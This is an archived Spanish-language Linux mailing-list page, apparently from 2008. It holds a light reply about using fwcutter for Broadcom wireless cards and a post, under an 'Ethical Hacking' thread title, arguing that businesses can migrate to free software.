Message-ID: <[EMAIL PROTECTED]>

Alvaro Herrera wrote:
> Alberto Rivera escribió:
>
>   
>> Hola Franco, mira lo mejor es que vayas a comprarlo con un livecd de ubuntu 
>> y uno de knoppix, así sabes altiro si funcionan todas las cosas, en el 
>> pero de los casos no te va a funcionar las tarjetas que tienen chipset 
>> broadcom pero le pones fw-cuuter y listo ...
>> 
>
> Te dejó loco el fwcutter, por lo que se ve!!!
>
>   
jajajaj =) buenisimo, claro si antes compilaba todo =), además, ahora me 
siento más parte del club ...


salu2


Ethical Hacking, aspectos a considerar.

2008-01-22 Thread Alberto Rivera
Jorge Severino wrote:
> [EMAIL PROTECTED] escribió el 21/01/2008 11:45:58:
>
>
>   
>> no comparto esta visión contigo, mi percepción es la de capacitar 
>> exponencialmente a las personas que están ejecutando las tareas 
>> informáticas, considerando los mismos valores de los servicios y 
>> licencias que prestan las empresas de software propietario, logrando con 
>> 
>
>   
>> esto una independencia y  avance considerable entre la gente que 
>> administra los recursos en tu empresa, el cual ojalá se pudiera 
>> compartir =) para que no sé pierda en el tiempo, pero esa es mi visión 
>> 
> 
>   
>
> Visión por cierto un poco soñadora y fuera del ámbito ambicioso 
> empresarial nacional.
>   
En realidad puedo ser un poco soñador, pero una alternativa 
completamente de software libre es posible, eso si un poco difícil de 
ponerla en práctica justamente por la conciencia ambiciosa de algunos 
empresarios, pero cuando es entendido por el empresariado que esto es 
mucho más económico a mediano y largo plazo, es posible implementar y 
migrar las soluciones sin tener un impacto mayor.
> Comparto plenamente en que hay cosas que no se pueden migrar debido al 
> impacto al negocio y el alto riesgo que implica.
>   
Insisto que hoy en día el impacto es muy bajo ... sobre todo en 
aplicaciones orientadas a la web, ahora si son desarrollo hecho a nivel 
local el escenario es completamente distinto y es se hace más difícil 
una migración.

salu2